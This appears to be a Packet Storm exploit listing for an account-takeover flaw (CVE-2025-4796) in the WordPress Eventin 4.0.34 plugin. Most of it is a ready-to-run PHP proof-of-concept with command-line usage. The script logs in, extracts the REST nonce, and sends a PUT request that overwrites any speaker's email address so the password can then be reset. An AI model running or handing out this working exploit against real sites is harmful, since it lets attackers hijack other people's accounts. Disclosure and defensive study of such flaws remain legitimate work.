Share
## https://sploitus.com/exploit?id=PACKETSTORM:216385
=============================================================================================================================================
| # Title : WordPress Eventin 4.0.34 Account Takeover Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/wp-event-solution/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796
[+] Summary :
A critical vulnerability exists in the Speaker Management component of the target
where an authenticated attacker can intercept the speaker update process and change any
speaker’s registered email address without proper authorization.
This flaw allows the attacker to hijack arbitrary accounts by modifying the email field
and subsequently triggering a password reset workflow.
The flaw is caused by insufficient authorization checks on the update_speaker endpoint
combined with predictable nonce retrieval.
[+] Affected Versions
----------------------------------------
All tested versions are confirmed vulnerable.
Vendor has not released a fix at the time of publishing.
[+] Vulnerability Details
----------------------------------------
The update_speaker.php endpoint accepts multiple fields including speaker_id and email
without verifying that the user performing the action is authorized to update the target
record.
Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making
cross-user actions possible.
Impact:
- Account takeover
- Unauthorized email modification
- Privilege escalation
- Full speaker profile compromise
[+] Usage
----------
Save the file:
poc.php
Run:
php poc.php https://target-site.com new@mail.com 12 admin 123456
[+] Poc
<?php
/*
* WordPress Eventin 4.0.34 Account Takeover
* By: Indoushka
*/
/* ---------------------------
SAFE PRINT
---------------------------- */
function Nxploited_safe_print($text) {
try {
echo $text . PHP_EOL;
} catch (Throwable $e) {
echo "[!] Print Error: " . $e->getMessage() . PHP_EOL;
}
}
/* ---------------------------
URL VALIDATION
---------------------------- */
function Nxploited_validate_url($url) {
if (!preg_match('/^https?:\/\//i', $url)) {
$url = "http://" . $url;
}
return rtrim($url, "/");
}
/* ---------------------------
EMAIL VALIDATION
---------------------------- */
function Nxploited_validate_email($email) {
return filter_var($email, FILTER_VALIDATE_EMAIL);
}
/* ---------------------------
DISABLE SSL WARNINGS
---------------------------- */
function Nxploited_disable_ssl(&$ch) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}
/* ---------------------------
LOGIN FUNCTION
---------------------------- */
function Nxploited_login($url, $username, $password, $user_agent) {
Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ...");
usleep(500000); // 0.5 ثانية (بديل sleep الممنوع)
$login_url = $url . "/wp-login.php";
$data = http_build_query([
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
Nxploited_disable_ssl($ch);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
$response = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
curl_close($ch);
preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m);
$cookies = $m[1];
foreach ($cookies as $c) {
if (strpos($c, "wordpress_logged_in") !== false) {
Nxploited_safe_print("[+] تسجيل الدخول ناجح.");
return true;
}
}
Nxploited_safe_print("[-] فشل تسجيل الدخول.");
exit(1);
}
/* ---------------------------
NONCE EXTRACTION
---------------------------- */
function Nxploited_extract_nonce($url, $user_agent) {
Nxploited_safe_print("[*] استخراج Nonce ...");
usleep(600000);
$admin_url = $url . "/wp-admin/post-new.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
curl_close($ch);
if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) {
Nxploited_safe_print("[+] Nonce: " . $m[1]);
return $m[1];
}
Nxploited_safe_print("[-] فشل استخراج Nonce.");
exit(1);
}
/* ---------------------------
UPDATE SPEAKER
---------------------------- */
function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) {
Nxploited_safe_print("[*] تحديث بيانات المتحدث ...");
usleep(600000);
$api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id;
$payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE);
$headers = [
"Content-Type: application/json",
"X-WP-Nonce: $nonce",
"User-Agent: $user_agent",
"Cookie: " . trim(file_get_contents("cookies.txt"))
];
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$json = json_decode($resp, true);
if ($code === 200 && isset($json["email"])) {
Nxploited_safe_print("[+] تم تحديث البريد إلى: $email");
return true;
}
Nxploited_safe_print("[-] فشل التحديث!");
print_r($json);
exit(1);
}
/* ---------------------------
SUCCESS BANNER
---------------------------- */
function Nxploited_custom_success($speaker_id, $email) {
Nxploited_safe_print("\n==============================");
Nxploited_safe_print(" Exploitation Completed");
Nxploited_safe_print("==============================");
Nxploited_safe_print("Speaker ID : $speaker_id");
Nxploited_safe_print("Email : $email");
Nxploited_safe_print("Please reset your password using the new email.\n");
}
/* ---------------------------
MAIN
---------------------------- */
$url = Nxploited_validate_url($argv[1]);
$email = $argv[2];
$speaker_id = $argv[3];
$username = $argv[4];
$password = $argv[5];
$user_agent = "Mozilla/5.0 (Indoushka PoC)";
if (!Nxploited_validate_email($email)) {
Nxploited_safe_print("[-] البريد غير صالح.");
exit(1);
}
Nxploited_login($url, $username, $password, $user_agent);
$nonce = Nxploited_extract_nonce($url, $user_agent);
Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent);
Nxploited_custom_success($speaker_id, $email);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================